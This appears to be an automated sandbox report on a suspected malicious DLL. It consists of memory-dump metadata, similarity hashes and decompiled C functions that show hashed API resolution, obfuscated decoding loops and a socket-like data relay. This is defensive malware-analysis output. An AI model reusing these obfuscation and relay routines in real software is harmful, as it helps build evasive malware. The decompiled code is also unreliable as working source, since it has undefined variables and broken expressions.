    0x6e4c891b
    0x6e4c8920
    0x6e4c8920
    0x6e4c8923
    0x6e4cbb96
    0x6e4cbba3
    0x6e4cbba9
    0x6e4cbbab
    0x6e4cbbb0
    0x6e4cbbb0
    0x6e4cbbc0
    0x6e4cbbd4
    0x6e4cbbdd
    0x6e4cbc03
    0x6e4cbc08
    0x6e4cbc19
    0x6e4cbc1c
    0x6e4cbc23
    0x6e4cbc34
    0x6e4cbc4d
    0x6e4cbc5d
    0x6e4cbc94
    0x6e4cbcb0
    0x6e4cbcbd
    0x6e4cbcc1
    0x6e4cbcd0
    0x6e4cbce5
    0x6e4cbceb
    0x6e4cbcfd
    0x6e4cbd02
    0x6e4cbd05
    0x6e4cbd08
    0x6e4cbd0e
    0x6e4cbd0e
    0x6e4cbd0e
    0x6e4cbd17
    0x6e4cbd20
    0x6e4cbd20
    0x6e4cbd37
    0x6e4cbd39
    0x6e4cbd3f
    0x6e4cbd53
    0x6e4cbd5d
    0x6e4cbd63
    0x6e4cbd85
    0x6e4cbd89
    0x6e4cbd9a
    0x6e4cbdac
    0x6e4cbdbb
    0x6e4cbdee
    0x6e4cbe01
    0x6e4cbe39
    0x6e4cbe45
    0x6e4cbe4a
    0x6e4cbe4d
    0x6e4cbe50
    0x6e4cbe63
    0x6e4cbe6e
    0x6e4cbe82
    0x6e4cbea9
    0x6e4cbeca
    0x6e4cbece
    0x6e4cbed3
    0x6e4cbed6
    0x6e4cbedb
    0x6e4cbedb
    0x6e4cbee5
    0x6e4cbeea
    0x6e4cbeed
    0x6e4cbefa
    0x6e4cbf10
    0x6e4cbf2b
    0x6e4cbf30
    0x6e4cbf44
    0x6e4cbf7c
    0x6e4cbf86
    0x6e4cbfa2
    0x6e4cbfaf
    0x6e4cbfe3
    0x6e4cbff2
    0x6e4cc00d
    0x6e4cc03b
    0x6e4cc045
    0x6e4cc05e
    0x6e4cc070
    0x6e4cc07e
    0x6e4cc0a2

    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 0a21bfc6c6906125fc00148c3588fd88febc5f8c77c8ddf3bbbf2f80f26f6fb0
    • Instruction ID: 6c061dfc308ae4991f620b8bed8f6a7c17e1fade7b3b1c7201c56c7c5114d155
    • Opcode Fuzzy Hash: 0a21bfc6c6906125fc00148c3588fd88febc5f8c77c8ddf3bbbf2f80f26f6fb0
    • Instruction Fuzzy Hash: 26D103F7D101116BEB009AF5AC45DBF39A9AB5922DF190929E818B7381FB319E1143F2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4B7170, Relevance: .3, Instructions: 325COMMON
    Download Yara Rule
    C-Code - Quality: 91%
    			E6E4B7170(void* __eflags, signed char* _a4, signed int _a8, intOrPtr* _a12) {
				signed int _v17;
				unsigned char _v18;
				signed int _v24;
				signed char* _v28;
				char _v29;
				signed char _v30;
				signed char _v31;
				signed char _v36;
				signed int _v37;
				unsigned int _v38;
				signed char _v39;
				void* _v40;
				intOrPtr _v44;
				char* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v137;
				char* _t75;
				char* _t77;
				char _t78;
				char* _t80;
				signed char _t81;
				signed char _t82;
				void* _t84;
				signed char _t87;
				signed char _t90;
				char _t103;
				void* _t104;
				signed char _t109;
				void* _t111;
				signed char _t114;
				intOrPtr _t116;
				void* _t118;
				char _t120;
				signed int _t123;
				signed int _t124;
				void* _t127;
				signed char _t132;
				signed char _t134;
				unsigned char _t135;
				signed char _t136;
				signed char _t143;
				char* _t149;
				signed int _t150;
				signed char* _t155;
				signed char* _t168;
				intOrPtr* _t179;
				signed int _t180;
				void* _t181;
				char* _t184;
				signed char _t186;
				intOrPtr _t187;
				signed int _t190;
				void* _t192;
				void* _t193;
				void* _t194;
				void* _t197;
				void* _t199;
				void* _t208;
				void* _t211;
				void* _t219;
				signed int _t223;

				_t219 = __eflags;
				_v56 = E6E4B1250(0x6e4d34b0,  &_v137);
				_v24 = _a8;
				_t75 = E6E4CD310( ~(E6E4B6CC0(_t219,  ~_a8, 0xffffffff)));
				_t197 = _t194 + 0x14;
				_t184 = _t75;
				if(_t75 == 0) {
					L28:
					return _t184;
				}
				_t77 = _t184;
				if(_a8 <= 0) {
					L26:
					 *_t77 = 0;
					_t179 = _a12;
					__eflags = _t179;
					if(_t179 != 0) {
						_t78 = _t77 - _t184;
						__eflags = _t78;
						E6E4B2640(_t77, _t184);
						 *_t179 = _t78;
					}
					goto L28;
				} else {
					_t155 = _a4;
					_v24 =  &(_t155[_v24]);
					_t80 = _t184;
					_v44 = _t184;
					do {
						_v48 = _t80;
						if(_t155 >= _v24) {
							goto L4;
						}
						_t132 = 0;
						_t223 = 0;
						_v52 = 0;
						do {
							_v28 = _t155;
							_t82 = E6E4BD6D0(_t223, _t155, _v24);
							_t199 = _t197 + 8;
							_t224 = _t82 & 0x00000001;
							if((_t82 & 0x00000001) == 0) {
								L17:
								_t41 = _t132 - 0x5cb212c5; // -1555174085
								_t84 = E6E4B6CC0(_t230, _t41, 1);
								_t186 = _t84 - E6E4B8AE0(0xab6317b7);
								E6E4B6CC0(_t230, _t132, 1);
								_t87 = E6E4B79D0(_t186, 4);
								_t197 = _t199 + 0x1c;
								_t155 = _v28;
								if(_t155 >= _v24 || (_t87 & 0x00000001) == 0) {
									break;
								} else {
									goto L19;
								}
							}
							_v36 = _t132;
							_t168 = _v28;
							do {
								_t150 =  *_t168 & 0x000000ff;
								_v28 =  &(_t168[1]);
								_t111 = E6E4BAB20(_t224, 0, 0xd5);
								_t211 = _t199 + 8;
								_t180 = 0;
								_t225 = _t150 - _t111 - 0x4f;
								if(_t150 - _t111 <= 0x4f) {
									_t180 =  *((char*)(_v56 + _t150 + E6E4B8AE0(0xf7d10559)));
									_t123 = E6E4B74F0(_t225, _t180, 0xffffffff);
									_t124 = E6E4B74F0(_t225, 0xff, 0xffffffff);
									_t211 = _t211 + 0x14;
									_t190 = _t124 | _t123;
									_t226 = _t190 - 0xffffffff;
									if(_t190 != 0xffffffff) {
										_t191 =  !_t190;
										E6E4B8AE0(0x82efaa8);
										_t27 = _t191 - 0x1a3af28e; // -440070798
										_t127 = E6E4B6CC0(_t226, _t27, 0x1a3af251);
										E6E4B6CC0(_t226,  !_t190, 0xffffffc3);
										_t211 = _t211 + 0x14;
										_t180 =  ==  ? 0 : _t127;
									}
								}
								_t114 = E6E4B4C00(E6E4B8AE0(0x82efa73) & _t180, 0);
								_t199 = _t211 + 0xc;
								_t168 = _v28;
							} while (_t168 < _v24 && (_t114 & 0x00000001) != 0);
							_t230 = _t114 & 0x00000001;
							if((_t114 & 0x00000001) == 0) {
								_t36 = _v52 - 0x50dca6fb; // -1356637947
								_t116 = E6E4B6CC0(__eflags, _t36, 0x50dca6fc);
								E6E4B6CC0(__eflags, _v52, 1);
								_t118 = E6E4B27A0(0xd2);
								_t199 = _t199 + 0x14;
								_t120 = _t118 + _t180 + 0xa1;
								__eflags = _t120;
								_t132 = _v36;
								 *((char*)(_t193 + _t132 - 0x24)) = _t120;
								_v52 = _t116;
							} else {
								_t132 = _v36;
							}
							goto L17;
							L19:
							_t223 = 1;
							_t132 = _t186;
						} while (1 != 0);
						_t187 = _v52;
						_t233 = _t187;
						if(_t187 == 0) {
							_t184 = _v44;
							0;
							goto L4;
						}
						_t134 = _v39;
						_v36 = _t134;
						_t135 = _t134 << 2;
						_v18 = _t135;
						_t136 = _t135 >> 4;
						_v17 =  !_t136;
						_t90 = E6E4B27A0(0xd0);
						_t143 =  !(_v17 |  !_t136 &  !_t90 | _v17 & 0x0000005c);
						_v31 = E6E4B7740(_t233, _t143 & 0x000000ff, E6E4B9950(0x5c,  !_t90 & 0x000000ff) & 0x000000ff) | _t143;
						E6E4B27A0(0x88);
						_t146 = _v38;
						_v30 = _v38 >> E6E4B27A0(0x8e) ^ _t146 | _v38 >> E6E4B27A0(0x8e) & _t146;
						_t103 = E6E4B9950(_v37 & _t146 << 0x00000006 & 0x000000ff, (_t146 << 0x00000006 ^ _v37) & 0x000000ff);
						_t197 = _t197 + 0x24;
						_v29 = _t103;
						if(_t187 < 2) {
							L25:
							_t184 = _v44;
							_t155 = _v28;
							goto L4;
						}
						_t104 = E6E4B2640(_t187, 1);
						_t208 = _t197 + 8;
						_t181 = _t104;
						_t192 = 0;
						_t149 = _v48;
						0;
						0;
						do {
							 *_t149 =  *(_t193 + _t192 - 0x1b) & 0x000000ff;
							_t149 = _t149 + 1;
							_t192 = E6E4B2640(0, E6E4B2640(0, 1) - _t192);
							_t109 = E6E4B4C00(_t108, _t181);
							_t208 = _t208 + 0x18;
							_t236 = _t109 & 0x00000001;
						} while ((_t109 & 0x00000001) == 0);
						_v48 = _t149;
						goto L25;
						L4:
						_t81 = E6E4BD6D0(_t236, _t155, _v24);
						_t197 = _t197 + 8;
						_t77 = _v48;
					} while ((_t81 & 0x00000001) != 0);
					goto L26;
				}
			}

































































    0x6e4b7170
    0x6e4b7190
    0x6e4b7193
    0x6e4b71a8
    0x6e4b71ad
    0x6e4b71b0
    0x6e4b71b4
    0x6e4b74d9
    0x6e4b74e2
    0x6e4b74e2
    0x6e4b71be
    0x6e4b71c0
    0x6e4b74bf
    0x6e4b74bf
    0x6e4b74c2
    0x6e4b74c5
    0x6e4b74c7
    0x6e4b74cb
    0x6e4b74cb
    0x6e4b74cf
    0x6e4b74d7
    0x6e4b74d7
    0x00000000
    0x6e4b71c6
    0x6e4b71c6
    0x6e4b71c9
    0x6e4b71cc
    0x6e4b71ce
    0x6e4b71fb
    0x6e4b71fe
    0x6e4b7201
    0x00000000
    0x00000000
    0x6e4b7203
    0x6e4b7203
    0x6e4b7205
    0x6e4b7210
    0x6e4b7213
    0x6e4b7217
    0x6e4b721c
    0x6e4b721f
    0x6e4b7221
    0x6e4b7341
    0x6e4b7341
    0x6e4b734a
    0x6e4b7361
    0x6e4b7366
    0x6e4b7371
    0x6e4b7376
    0x6e4b7379
    0x6e4b737f
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e4b737f
    0x6e4b7227
    0x6e4b722a
    0x6e4b7230
    0x6e4b7230
    0x6e4b7234
    0x6e4b723e
    0x6e4b7243
    0x6e4b724a
    0x6e4b724c
    0x6e4b724f
    0x6e4b7263
    0x6e4b726a
    0x6e4b727b
    0x6e4b7280
    0x6e4b7285
    0x6e4b7287
    0x6e4b728a
    0x6e4b728c
    0x6e4b7293
    0x6e4b729d
    0x6e4b72a9
    0x6e4b72b6
    0x6e4b72bb
    0x6e4b72c5
    0x6e4b72c5
    0x6e4b728a
    0x6e4b72da
    0x6e4b72df
    0x6e4b72e2
    0x6e4b72e5
    0x6e4b72f2
    0x6e4b72f4
    0x6e4b7303
    0x6e4b730f
    0x6e4b731c
    0x6e4b7329
    0x6e4b732e
    0x6e4b7335
    0x6e4b7335
    0x6e4b7337
    0x6e4b733a
    0x6e4b733e
    0x6e4b72f6
    0x6e4b72f6
    0x6e4b72f6
    0x00000000
    0x6e4b7385
    0x6e4b7387
    0x6e4b7389
    0x6e4b7389
    0x6e4b7391
    0x6e4b7394
    0x6e4b7396
    0x6e4b71d3
    0x6e4b71dc
    0x00000000
    0x6e4b71dc
    0x6e4b739f
    0x6e4b73a2
    0x6e4b73a5
    0x6e4b73a8
    0x6e4b73ab
    0x6e4b73b2
    0x6e4b73bc
    0x6e4b73e4
    0x6e4b7406
    0x6e4b740e
    0x6e4b741d
    0x6e4b743b
    0x6e4b7452
    0x6e4b7457
    0x6e4b745a
    0x6e4b7460
    0x6e4b74b4
    0x6e4b74b4
    0x6e4b74b7
    0x00000000
    0x6e4b74b7
    0x6e4b7465
    0x6e4b746a
    0x6e4b746d
    0x6e4b746f
    0x6e4b7471
    0x6e4b747a
    0x6e4b747e
    0x6e4b7480
    0x6e4b7485
    0x6e4b7487
    0x6e4b74a1
    0x6e4b74a5
    0x6e4b74aa
    0x6e4b74ad
    0x6e4b74ad
    0x6e4b74b1
    0x00000000
    0x6e4b71e0
    0x6e4b71e6
    0x6e4b71ed
    0x6e4b71f2
    0x6e4b71f2
    0x00000000
    0x6e4b71fb

    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 9d02874457a2e2f35eab7e7807defa8bb27cd0e622c954fa4e2b138c00a92564
    • Instruction ID: add99d31cca364095202aac833ae82c4007e0908c64d6c5993f53d43932d5f12
    • Opcode Fuzzy Hash: 9d02874457a2e2f35eab7e7807defa8bb27cd0e622c954fa4e2b138c00a92564
    • Instruction Fuzzy Hash: EF914AB5E442155BDF004AF8AC95FEE7B789B1631DF08066AEC44773C2E6354A0887F2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4CEAB0, Relevance: .2, Instructions: 221COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E6E4CEAB0(void* __eflags, char* _a4) {
				char _v20;
				signed char _v21;
				signed char _v22;
				char _v28;
				char _t37;
				void* _t39;
				intOrPtr _t41;
				void* _t43;
				signed char _t47;
				char* _t49;
				void* _t50;
				char* _t51;
				void* _t52;
				void* _t53;
				void* _t58;

				_t51 = _a4;
				_t37 = E6E4BA9B0(_t51);
				_t53 = _t52 + 4;
				_v28 = _t37;
				if(_t37 >= 0) {
					_t49 = _t51;
					_t43 = 0;
					_t50 = 0;
					if( *_t49 == 0x5c) {
						L6:
						_v20 = E6E4B2640(0, _t43);
						_t39 = E6E4B2640(0, 1);
						_t49 = _a4;
						_t53 = _t53 + 0x10;
						_t41 =  *((intOrPtr*)(_t49 - _t39 + _v20));
						_t47 = _t41 + 0xde;
						if(_t47 > 0x56) {
							goto L3;
						} else {
							_v20 = 0;
							switch( *((intOrPtr*)((_t47 & 0x000000ff) * 4 +  &M6E4D30D4))) {
								case 0:
									_v20 = _t41;
									goto L22;
								case 1:
									goto L3;
								case 2:
									L22:
									_t43 = _t43 + 1;
									E6E4B6CC0(_t60, _t43, 1);
									_t49 = _a4;
									_t53 = _t53 + 8;
									_t37 = _v20;
									goto L4;
								case 3:
									__al = 7;
									_v20 = __eax;
									goto L22;
								case 4:
									__al = 8;
									_v20 = __eax;
									goto L22;
								case 5:
									__al = 0xc;
									_v20 = __eax;
									goto L22;
								case 6:
									__al = 0xa;
									_v20 = __eax;
									goto L22;
								case 7:
									__al = 0xd;
									_v20 = __eax;
									goto L22;
								case 8:
									__al = 9;
									_v20 = __eax;
									goto L22;
								case 9:
									__al = 0xb;
									_v20 = __eax;
									goto L22;
								case 0xa:
									__cl =  *((intOrPtr*)(__edx + __ebx + 2));
									_v20 = __ecx;
									__al =  *((intOrPtr*)(__edx + __ebx + 3));
									_v21 = __al;
									__eax = __ecx;
									__al = __al + 0xd0;
									__al & 0x000000ff = E6E4BD390(__eflags, __al & 0x000000ff, 0xa);
									__ecx = _v20;
									__eflags = __al & 0x00000001;
									if((__al & 0x00000001) != 0) {
										L19:
										__al = _v21;
										__al = _v21 + 0xd0;
										_v22 = __al;
										__eax = E6E4B27A0(0x86);
										__cl = _v21;
										__eflags = _v22 - __al;
										if(_v22 >= __al) {
											__eax = __ecx;
											__al = __al + 0xbf;
											__eflags = __al - 6;
											if(__al >= 6) {
												__eflags = __cl - 6;
												if(__eflags >= 0) {
													goto L22;
												}
											}
										}
									} else {
										__eax = __ecx;
										__al = __al + 0x9f;
										__eflags = __al - 6;
										if(__al < 6) {
											goto L19;
										} else {
											__eax = __ecx;
											__eflags = __al - 5;
											if(__eflags > 0) {
												goto L22;
											} else {
												goto L19;
											}
										}
									}
									goto L23;
							}
						}
					} else {
						L3:
						_t37 =  *((intOrPtr*)(_t49 + _t43));
						L4:
						 *_t51 = _t37;
						_t50 = _t50 + 1;
						_t51 = _t51 + 1;
						_t58 = _t43 - _v28;
						_t43 = _t43 + 1;
						if(_t58 < 0) {
							if( *((char*)(_t49 + _t43)) != 0x5c) {
								goto L3;
							} else {
								goto L6;
							}
						}
					}
				}
				L23:
				return _t37;
			}


















    0x6e4ceab9
    0x6e4ceabd
    0x6e4ceac2
    0x6e4ceac5
    0x6e4ceaca
    0x6e4cead0
    0x6e4cead2
    0x6e4cead4
    0x6e4ceada
    0x6e4ceaf9
    0x6e4ceb04
    0x6e4ceb0b
    0x6e4ceb10
    0x6e4ceb13
    0x6e4ceb1d
    0x6e4ceb21
    0x6e4ceb27
    0x00000000
    0x6e4ceb29
    0x6e4ceb29
    0x6e4ceb33
    0x00000000
    0x6e4ceb3a
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e4cebe0
    0x6e4cebe3
    0x6e4cebe4
    0x6e4cebe9
    0x6e4cebec
    0x6e4cebef
    0x00000000
    0x00000000
    0x6e4ceb42
    0x6e4ceb44
    0x00000000
    0x00000000
    0x6e4ceb4c
    0x6e4ceb4e
    0x00000000
    0x00000000
    0x6e4ceb56
    0x6e4ceb58
    0x00000000
    0x00000000
    0x6e4ceb60
    0x6e4ceb62
    0x00000000
    0x00000000
    0x6e4ceb67
    0x6e4ceb69
    0x00000000
    0x00000000
    0x6e4ceb6e
    0x6e4ceb70
    0x00000000
    0x00000000
    0x6e4ceb75
    0x6e4ceb77
    0x00000000
    0x00000000
    0x6e4ceb7c
    0x6e4ceb80
    0x6e4ceb83
    0x6e4ceb87
    0x6e4ceb8a
    0x6e4ceb8c
    0x6e4ceb94
    0x6e4ceb99
    0x6e4ceb9f
    0x6e4ceba1
    0x6e4cebb3
    0x6e4cebb3
    0x6e4cebb6
    0x6e4cebb8
    0x6e4cebc0
    0x6e4cebc5
    0x6e4cebcb
    0x6e4cebce
    0x6e4cebd0
    0x6e4cebd2
    0x6e4cebd4
    0x6e4cebd6
    0x6e4cebdb
    0x6e4cebde
    0x00000000
    0x00000000
    0x6e4cebde
    0x6e4cebd6
    0x6e4ceba3
    0x6e4ceba3
    0x6e4ceba5
    0x6e4ceba7
    0x6e4ceba9
    0x00000000
    0x6e4cebab
    0x6e4cebab
    0x6e4cebaf
    0x6e4cebb1
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e4cebb1
    0x6e4ceba9
    0x00000000
    0x00000000
    0x6e4ceb33
    0x6e4ceae0
    0x6e4ceae0
    0x6e4ceae0
    0x6e4ceae3
    0x6e4ceae3
    0x6e4ceae5
    0x6e4ceae6
    0x6e4ceae7
    0x6e4ceaea
    0x6e4ceaed
    0x6e4ceaf7
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e4ceaf7
    0x6e4ceaed
    0x6e4ceada
    0x6e4cebfe
    0x6e4cebfe

    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 53abd5dae149a42c347f5b2e26753cc5c83b7dd0a8be8be4483cde5ded23f1cd
    • Instruction ID: 8058a99a8762c2ab9e7019e44302f3a32ff9f94bf846340a5e5640d6ebd08b9b
    • Opcode Fuzzy Hash: 53abd5dae149a42c347f5b2e26753cc5c83b7dd0a8be8be4483cde5ded23f1cd
    • Instruction Fuzzy Hash: 1361F468D442569FDB008FF89C92EFFBBB1AB02748F000827E6415B341E775455687E3
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4C9BF0, Relevance: .1, Instructions: 133COMMON
    Download Yara Rule
    C-Code - Quality: 60%
    			E6E4C9BF0(void* __eflags, intOrPtr _a4, void _a8, intOrPtr _a12) {
				intOrPtr _v20;
				char _v24;
				intOrPtr _v276;
				intOrPtr _v280;
				char _v284;
				char _v1308;
				signed int _t30;
				intOrPtr* _t32;
				void* _t33;
				intOrPtr* _t35;
				void* _t36;
				intOrPtr* _t39;
				intOrPtr* _t40;
				intOrPtr _t41;
				intOrPtr* _t42;
				void* _t43;
				signed int _t44;
				void* _t59;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t66;
				void* _t69;

				_v24 = 0;
				_v20 = E6E4B8AE0(0x82f7c2c);
				_v284 = 2;
				_v280 = _a4;
				_v276 = _a8;
				_t30 = E6E4B8AE0(0x82efa8a);
				_t32 = E6E4CF5C0(_t30, E6E4B8AE0(0xfb2d128));
				_t66 = _t62 + 0x14;
				_t33 =  *_t32(0,  &_v284, 0, 0,  &_v24);
				if(_t33 != 0xffffffff) {
					_t59 = _t33;
					if(_a12 != 0) {
						L5:
						_t35 = E6E4CF5C0(0, E6E4B8AE0(0x8571068));
						_t36 =  *_t35(_a12, 0);
						_t33 = E6E4B8AE0(0x82efb8e);
						_t66 = _t66 + 0x10;
						if(_t36 == _t33) {
							goto L6;
						}
					} else {
						do {
							L6:
							if(_t59 <= 0 || _v284 == 0) {
								L3:
								_v284 = 2;
								_v280 = _a4;
								_v276 = _a8;
								_t39 = E6E4CF5C0(6, 0x79c2ba4);
								_t66 = _t66 + 8;
								_t33 =  *_t39(0,  &_v284, 0, 0,  &_v24);
								_t59 = _t33;
								if(_t33 != 0xffffffff) {
									goto L4;
								}
							} else {
								_t44 = 0;
								while(1) {
									_t53 =  *((intOrPtr*)(_t61 + _t44 * 4 - 0x114));
									_t40 = E6E4CF5C0(6, 0x78ba6);
									_t69 = _t66 + 8;
									_t33 =  *_t40( *((intOrPtr*)(_t61 + _t44 * 4 - 0x114)),  &_v1308, 0x400, 0);
									if(_t33 <= 0) {
										goto L13;
									}
									_t60 = _t33;
									_t41 = _a4;
									_t55 =  ==  ? _a8 : _t41;
									_t42 = E6E4CF5C0(6, 0x79c44);
									_t43 =  *_t42( ==  ? _a8 : _t41,  &_v1308, _t60, 0);
									_t33 = E6E4B6CC0(_t53 - _t41, _t44, 1);
									_t66 = _t69 + 0x10;
									if(_t43 == _t60) {
										_t44 = _t44 + 1;
										if(_t44 < _v284) {
											continue;
										} else {
											goto L3;
										}
									}
									goto L13;
								}
							}
							goto L13;
							L4:
						} while (_a12 == 0);
						goto L5;
					}
				}
				L13:
				return _t33;
			}


























    0x6e4c9c02
    0x6e4c9c16
    0x6e4c9c19
    0x6e4c9c23
    0x6e4c9c29
    0x6e4c9c34
    0x6e4c9c4d
    0x6e4c9c52
    0x6e4c9c66
    0x6e4c9c6b
    0x6e4c9c71
    0x6e4c9c77
    0x6e4c9ccf
    0x6e4c9cdf
    0x6e4c9cec
    0x6e4c9cf5
    0x6e4c9cfa
    0x6e4c9cff
    0x00000000
    0x00000000
    0x6e4c9c79
    0x6e4c9d05
    0x6e4c9d05
    0x6e4c9d07
    0x6e4c9c80
    0x6e4c9c80
    0x6e4c9c8d
    0x6e4c9c96
    0x6e4c9ca3
    0x6e4c9ca8
    0x6e4c9cbc
    0x6e4c9cbe
    0x6e4c9cc3
    0x00000000
    0x00000000
    0x6e4c9d1a
    0x6e4c9d1a
    0x6e4c9d20
    0x6e4c9d20
    0x6e4c9d2e
    0x6e4c9d33
    0x6e4c9d45
    0x6e4c9d49
    0x00000000
    0x00000000
    0x6e4c9d4b
    0x6e4c9d4d
    0x6e4c9d54
    0x6e4c9d5f
    0x6e4c9d72
    0x6e4c9d79
    0x6e4c9d7e
    0x6e4c9d83
    0x6e4c9d85
    0x6e4c9d8c
    0x00000000
    0x6e4c9d8e
    0x00000000
    0x6e4c9d8e
    0x6e4c9d8c
    0x00000000
    0x6e4c9d83
    0x6e4c9d20
    0x00000000
    0x6e4c9cc9
    0x6e4c9cc9
    0x00000000
    0x6e4c9d05
    0x6e4c9c77
    0x6e4c9d9d
    0x6e4c9d9d

    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: ad7b5e008877cc75cfbd5e9f5a15df25e59c0797a85ee8023201058449e0a4b4
    • Instruction ID: 502c6cebe9ecdbb4226e7dd97289cc68c6f9350e0b7c987fb9b9b48dd1bfe291
    • Opcode Fuzzy Hash: ad7b5e008877cc75cfbd5e9f5a15df25e59c0797a85ee8023201058449e0a4b4
    • Instruction Fuzzy Hash: F441FB75D402197FEB509EB4DC42FEE72A4AB44B1DF100566EA09B7280FBB15B44CAE3
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4B2DD0, Relevance: .1, Instructions: 116COMMONCrypto
    Download Yara Rule
    C-Code - Quality: 96%
    			E6E4B2DD0(signed int _a4, signed int _a8) {
				void* _v8;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v37;
				signed int _t40;
				signed int _t45;
				signed int _t46;
				signed int _t48;
				signed int _t49;
				signed int _t55;
				signed int _t57;
				signed int _t70;
				signed int _t78;
				signed char _t92;
				signed int _t96;
				signed int _t103;

				_t48 = _a8;
				_t40 = _a4;
				_t96 = _t40 ^ 0x082efa8c;
				_v28 = _t48 ^ 0x7856dfe0;
				_v32 = _t96;
				_t55 = _t40 ^ _t96;
				_v24 = _t55;
				_t57 = (_t55 ^ _t40) - _t96;
				_v37 = _t57;
				_v36 = _t57 - _t40;
				if((_v37 >> 0x0000001f ^ _t48 | _t40 ^ _v37) != 0) {
					asm("sbb esi, ecx");
					if(_v24 >= _t40 && (_v28 ^ _t48 | _v32 ^ _t40) != 0) {
						_t92 = _v36 - _t40 + 0x24;
						_v36 = _t92;
						_v37 = (_t92 & 0x000000ff) * 0x7a;
					}
				}
				if((_v36 >> 0x0000001f ^ _t48 | _t40 ^ _v36) != 0 || (_v28 ^ _t48 | _v32 ^ _t40) != 0 || (_v36 >> 0x0000001f ^ _t48 | _t40 ^ _v36) != 0) {
					_t70 = _v37 + 0xad;
					_v36 = _t70;
					_t103 = (_v32 & _t70) + _t70;
					_v24 = _t103;
					_v20 = _t103 + _t70;
				}
				if((_v36 >> 0x0000001f ^ _t48 | _t40 ^ _v36) == 0 && ((_v28 ^ _t48 | _v32 ^ _t40) == 0 || (_t48 ^ _v28 | _v32 ^ _t40) != 0)) {
					_t49 = _v20;
					_t78 = _t49 + 0x2bf;
					_v36 = _t78;
					_t45 = (_t40 ^ _t78) + _t49;
					_v20 = _t45;
					_t46 = _t45 * _t78;
					_v16 = _t46;
					_v37 = _t46 - _v32;
				}
				 *0x6e4d50d4 = _v37;
				return _v32;
			}























    0x6e4b2dda
    0x6e4b2ddd
    0x6e4b2de2
    0x6e4b2df0
    0x6e4b2df4
    0x6e4b2dfa
    0x6e4b2dfc
    0x6e4b2e02
    0x6e4b2e04
    0x6e4b2e0d
    0x6e4b2e21
    0x6e4b2e2e
    0x6e4b2e30
    0x6e4b2e48
    0x6e4b2e51
    0x6e4b2e58
    0x6e4b2e58
    0x6e4b2e30
    0x6e4b2e6b
    0x6e4b2e95
    0x6e4b2e98
    0x6e4b2ea2
    0x6e4b2ea4
    0x6e4b2eaa
    0x6e4b2eaa
    0x6e4b2ebd
    0x6e4b2edd
    0x6e4b2ee1
    0x6e4b2ee7
    0x6e4b2ef0
    0x6e4b2ef2
    0x6e4b2ef6
    0x6e4b2ef9
    0x6e4b2f01
    0x6e4b2f01
    0x6e4b2f0a
    0x6e4b2f1c

    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 7ca4c830b702df7daa69a6577a6d5ac5cd57bad196e188d8bc4703f2e059a623
    • Instruction ID: f4dc7bb6731ff346f742b85f8619771a0695726005d705a7f5d1186bd55d5474
    • Opcode Fuzzy Hash: 7ca4c830b702df7daa69a6577a6d5ac5cd57bad196e188d8bc4703f2e059a623
    • Instruction Fuzzy Hash: A0414436E193225BC354CF79C54045BFBE29FC8650F16CA6EE89C9B348DA709D0687C6
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4BB3D0, Relevance: .1, Instructions: 111COMMONCrypto
